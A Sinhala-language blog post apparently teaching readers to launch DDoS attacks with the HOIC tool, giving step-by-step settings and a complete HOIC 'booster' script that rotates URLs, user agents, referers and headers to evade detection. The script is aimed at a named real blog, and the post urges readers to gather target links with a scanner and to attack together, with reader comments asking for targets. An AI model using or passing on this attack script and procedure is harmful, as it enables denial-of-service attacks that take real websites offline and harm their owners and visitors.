Skip to main content

DDoS ඇටෑක් එකක් දෙමුද? HOIC


ගෙවී ගිය අවුරුදු කීපය තුළ දැවන්තම සයිබර් ප්‍රහාරය! 


හැබැයි එව්වනං ගැහුවෙ බොට් එහෙම දාලා. මෙකෙනුත් ගැහුවා FBI එකට.

හෑ... මේ මොකක්ද කියන්නෙ?  ඇයි කාටවත් කියන්න ඕන නෑනෙ DDoS ගැන, හැමෝම දැං ඕක ගැන දන්නවනෙ.  හා කෙටියෙං කියන්නං මේකෙං කරන්නෙ වෙබ් අඩවියකට ට්‍රැෆික් එකක් දෙන එක. හැක් හොද දරුණු ට්‍රැෆික් එකක් අස්සෙං යන්න පුළුවන්ද? බෑනෙ. තා පහදන්න ඕනෙයි? බෑ මම දන්නෙ නෑ...

බොට් නෙට් භාවිතා නොකර DDoS ගහන්න පුළුවන් හොදම ටූල් එකක් තමයි HOIC කියන්නෙ. මම HOIC  වැඩකරන හැටි(සිද්ධාන්ත) දන්නෙ නෑ. ඒත්, වැඩ කරවගන්න හැටි කියාදෙන්නං. 


  • මුලිංම අවශ්‍යය හතුරු අඩවියේ ලිංකුව ගන්න.  ලිංකුවේ http:// හෝ https:// තිබිය යුතුය. http://allbloglk.blogspot.com/ 
  • පසුව HOIC රන් කරලා දකුණෙ පහල තියෙන “ + “ ලකුණ ඔබලා එන වින්ඩෝවෙ URL යටතෙ එම ලිංකුව Past (Ctrl+V) කරන්න.
  • ඊළඟට Power යටතෙ ඔයාට අවශ්‍යය බලය දෙන්න.  High තමා හොදම ඒත් ඔයාගෙ පරිගණකය ස්ලෝ වේවි. ඒක නිසා Medium දෙන්න. Booster එකක් දැම්මොත් තවත් සාර්ථකයි. අපිට ඒ පිළිබද දැනුමක් නෑ... ඒක එහෙම්මම තීන්න ඇරලා Add ඔබන්න.
  • මීළඟට THREADS ගාන දෙන්න. ප්‍රමාණෙ වැඩිවන තරමට තමා හොද. ඒත් පෙර පරිදිම ඔයාගෙ පරිගණකය ස්ලෝ වෙන්න පුළුවන්. ඒක නිසා 4-5ක්  විතර ඇති.
  • හරි! දැං ප්‍රහාරය අරඹන්න. FIRE TEH LAZER! මත ඔබන්න. adult smileys
පහත රූපෙ උඩ ඔබලා තව බලාගන්න.


Booster එකක් දැම්මොත් හොදයි කීවනෙ දැං බලමු එයිංකක් හදන හැටි.

පහත කෝඩ් එක බලන්න. දිගයි කරන්න දෙයක් නෑ...

Dim useragents() as String
Dim referers() as String
dim randheaders() as string
Dim randURLs() as string

// populate rotating urls
// IF YOU WANT TO IMPROVE THE ATTACK, ADD URLS BELONGING TO THIS DOMAIN OR RELATED SUBDOMAINS!!! PRO-TIP: You should create anew target and .HOIC file if u want to attack a different organization
randURLs.Append "http://allbloglk.blogspot.com/"
randURLs.Append "http://www.allbloglk.blogspot.com/2012/08/copy.html"
randURLs.Append "http://www.allbloglk.blogspot.com/search/label/Games"
randURLs.Append "http://allbloglk.blogspot.com/p/functiond-s-id-var-js-fjs-d.html"


// rotate out url
URL =  randURLs(RndNumber(0, randURLs.UBound))

// EDIT THE FOLLOWING STRINGS TO MAKE YOUR OWN BOOST UNIQUE AND THEREFORE MORE EVASIVE!

// populate list
useragents.Append "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"
useragents.Append "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
useragents.Append "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
useragents.Append "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)"
useragents.Append "Mozilla/4.0 (compatible; MSIE 5.0; Windows NT 5.1; .NET CLR 1.1.4322)"
useragents.Append "Googlebot/2.1 ( http://www.googlebot.com/bot.html) "
useragents.Append "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.601.0 Safari/534.14"
useragents.Append "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.600.0 Safari/534.14"
useragents.Append "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.0 Safari/534.13"
useragents.Append "Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Ubuntu/10.04 Chromium/9.0.595.0 Chrome/9.0.595.0 Safari/534.13"
useragents.Append "Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.2; WOW64; .NET CLR 2.0.50727)"
useragents.Append "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0; Media Center PC 4.0; SLCC1; .NET CLR 3.0.04320)"
useragents.Append "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; zh-cn) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5"
useragents.Append "Mozilla/5.0 (Windows; U; Windows NT 6.1; es-ES) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0 Safari/533.16"
useragents.Append "Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51"
useragents.Append "Mozilla/5.0 (Windows NT 5.1; U; Firefox/5.0; en; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 10.53"

// populate referer list
referers.Append "https://www.google.lk/search?q=all+blog+lk"
referers.Append "https://www.google.lk/search?q=all+blog+lk+sri+lanka"



// Add random headers
randheaders.Append "Cache-Control: no-cache"
randheaders.Append "If-Modified-Since: Sat, 29 Oct 1994 11:59:59 GMT"
randheaders.Append "If-Modified-Since: Tue, 18 Sep 2002 10:34:27 GMT"
randheaders.Append "If-Modified-Since: Mon, 12 Aug 2004 12:54:49 GMT"
randheaders.Append "If-Modified-Since: Wed, 30 Jan 2000 01:21:09 GMT"
randheaders.Append "If-Modified-Since: Tue, 18 Aug 2006 08:49:15 GMT"
randheaders.Append "If-Modified-Since: Fri, 20 Oct 2006 09:34:27 GMT"
randheaders.Append "If-Modified-Since: Mon, 29 Oct 2001 05:17:09 GMT"
randheaders.Append "If-Modified-Since: Tue, 18 Apr 2003 12:54:49 GMT"
randheaders.Append "If-Modified-Since: Sat, 18 Aug 2002 12:54:49 GMT"
randheaders.Append "If-Modified-Since: Wed, 30 Jan 2000 01:21:09 GMT"
randheaders.Append "If-Modified-Since: Tue, 18 Aug 2009 08:49:15 GMT"
randheaders.Append "If-Modified-Since: Fri, 20 Jun 2006 09:34:27 GMT"
randheaders.Append "If-Modified-Since: Sun, 13 Oct 2007 11:59:59 GMT"
randheaders.Append "If-Modified-Since: Tue, 18 Aug 2003 12:54:49 GMT"
randheaders.Append "If-Modified-Since: Wed, 30 Jan 2002 01:21:09 GMT"
randheaders.Append "If-Modified-Since: Tue, 18 Aug 2009 08:49:15 GMT"
randheaders.Append "If-Modified-Since: Fri, 20 Oct 2008 09:34:27 GMT"
randheaders.Append "If-Modified-Since: Mon, 29 Oct 2007 11:59:59 GMT"
randheaders.Append "If-Modified-Since: Tue, 18 Aug 2001 12:54:49 GMT"

Headers.Append "Keep-Alive: 115"
Headers.Append "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7"
Headers.Append "Connection: keep-alive"

// ------------------ DO NOT EDIT BELOW THIS LINE

// generate random referer
Headers.Append "Referer: " + referers(RndNumber(0, referers.UBound))
// generate random user agent (DO NOT MODIFY THIS LINE)
Headers.Append "User-Agent: " + useragents(RndNumber(0, useragents.UBound))
// Generate random headers
Headers.Append randheaders(RndNumber(0, randheaders.UBound))


ඔය කොඩිං ඒකේ // populate rotating urls යටතෙ තිබෙන randURLs.Append ඉදිරියේ දැක්වෙන පරිදි " " ලෙස කමා තුළ හතුරු අඩවියේ ලිංකු දාන්න ඕන.
උදා:-
අඩවියේ ප්‍රධාන ලිංකුව, ලේබල් ලිංකු, පේජ් ලිංකු.... වැනි දෑ
අපිට ඕන හැටියෙ ඔතන randURLs.Append  ලෙස පේළි දමමිං හතුරු අඩවියේ ඕනෑම ලිංකු ප්‍රමාණයක් ඇතුලක් කළ හැක. වෙබ් අඩවි scan කරන එව්වයිං ඔය හැම ලිංකුවක්ම ගත හැකි. එයිං හොදම එක තමා Acunetix Web Vulnerability Scanner (මේ තීන්නෙ මම චැනල් 4ට ගත්තු ලිංකු ඕන කෙනෙක් ඉන්නවනං මෙහෙයුම ආයෙ පටං ගන්න.)

ඊළඟට තිබෙන // populate referer list යටතෙ එම අඩවිය රෙෆ(ර්) කරන ගූගල් සර්ච් එනිජිම, නැතිනං වෙනත් අඩවි එක් කරන්න පුළුවන්. ඒකියන්නෙ ගූගල්හි විවිධ ලෙස සෙවුම් දමමිං ලිංකු ඇතුළත් කරන්න පුළුවන්.
උදා සෙවීම්:- 
all blog lk
all blog sri lanka
පහත පින්තූරය මත ඔබා බලන්න.
කලිං පරිදි referers.Append ඉදිරියේ " " ලෙස කමා යොදා ඕනෑ තරම් ලිංකු යෙදිය හැක.  
ඉවරයි.
ආ මේ ඕක නෝට් පෑඩ් එකේ කරලා .hoic විදියට සේව් කර ගන්න ඇ.
උදා:- allbloglk.hoic


එහෙම සේව් කරලා hoic.exe ෆයිල් එක තීන ෆෝල්ඩර් එකටම ඒක දාන්න. දැං පෙර පරිදිම URL, Power අනං මනං හදලා හතුරු .hoic එකත් තෝරලා දෙන්න.


තනියෙං කල්ලා අඩිවියක් හිට්ටන්න බෑ ඈ. කට්ටිය හැකිතාක් වැඩිවෙන තරමට තමා සාර්ථක.

ආ මෙන්න අහුවුණොත් දඩේ හූ ඇ.  රතුපාටිං කොටු කරලා තීන්නෙ.
ඒනං පට්ට දිග වගේ පෙණුන පෝස්ටුව ඉවරයි ඇ. පිට් තමා ජයවේවා!
 
ෆේස්බුක් කමෙන්ටුවක් දාන්න මෙතන ඔබන්න.



Comments

  1. Full tutorial

    http://blog.spiderlabs.com/2012/01/hoic-ddos-analysis-and-detection.html

    ReplyDelete
  2. හත් ඉලව්වේ , පිස්සු වගේ , :) <
    ම්ම් මේක DDOS නෙමයි නේද , මේක DOS - Denial of service Attack එකක්නේ

    ජය !

    ReplyDelete
  3. @නොහික්මුණු ඇස එල මචං පිටි තමා සාමාන්‍යය ඩොස් එකකට වඩා බලවත් ;)

    ReplyDelete
  4. අඩා මට මොකක්දෝ උනාද මන්දා,,, එල එල ඈහ් .... කරන්නෙනම් නෑ ඕන්. මට හතුරු අඩවි කියල එකක්වත් නැහැනේ... පුළුවන් නම් එකක් කියන්නකෝ

    ReplyDelete

Post a Comment

ඔබේ අදහසට බෝම තුති. (ඔබගේ සියළුම අදහස් කියවන අතර, ඔබගේ ගැටළු වලට පමණක් නැවත Reply කරන බව කරුණාවෙන් සළකන්න)

Popular posts from this blog

මයික්‍රෝසොෆ්ට්ට වෙන්න තිබුණා ලෝකේ අංක එක.

ලංකාවෙ ඇපල් කාරයො හිතන් හිටියට ස්ටීව් ජොබ්ස් වගේ ලෝකෙටම ඉන්නෙ එකම එක පොරයි ඉන්නෙ කියල, ජොබ්ස් මාමගෙ ඔලුවට ඇපල් ගෙඩිය වැටිල මොලේ පෑදෙන්න කලින් ඉඳලම බිල් මාමාට මොලේ තිබිල තියනව. හැබැයි ඉතින් ස්ටීව් මාමට වගේ ඇඟේ ගහන්න කපටි හැකියාවක් තිබිල නෑ. මේ තියෙන්නෙ ඒ වගේ බිල් මාමගෙ වැඩ ටිකක්.... Read full article

Linux Files Windows වලට Backup කරමු - CentOS

මේක මට ආව ප්‍රශ්නයක් නිසා, මම ඉගෙන ගත්තා තවත් කාට හරි ඕනේ උනොත් කියලා මේකේ දානවා. Linux වලට මම පාවිච්චි කරන්නේ CentOS මුලින්ම අපිට windows පරිගනකයක ෆෝල්ඩර් එකක් හදලා ශෙයා කරගන්න වෙනවා. ඊට අමතරව  user කෙනක් හදලා  ඒ user ට ශෙයා ෆෝල්ඩර් එකේ පර්මිෂන් දෙන්න. දැනට තියෙන user කෙනෙක් උනත් කමක් නෑ. ඒත් ආරක්‍ෂාව මදිනේ. මම ඒ ෆෝල්ඩරේ ශෙයා නේම් එක winbackup කියලා ගන්නම්. reade more...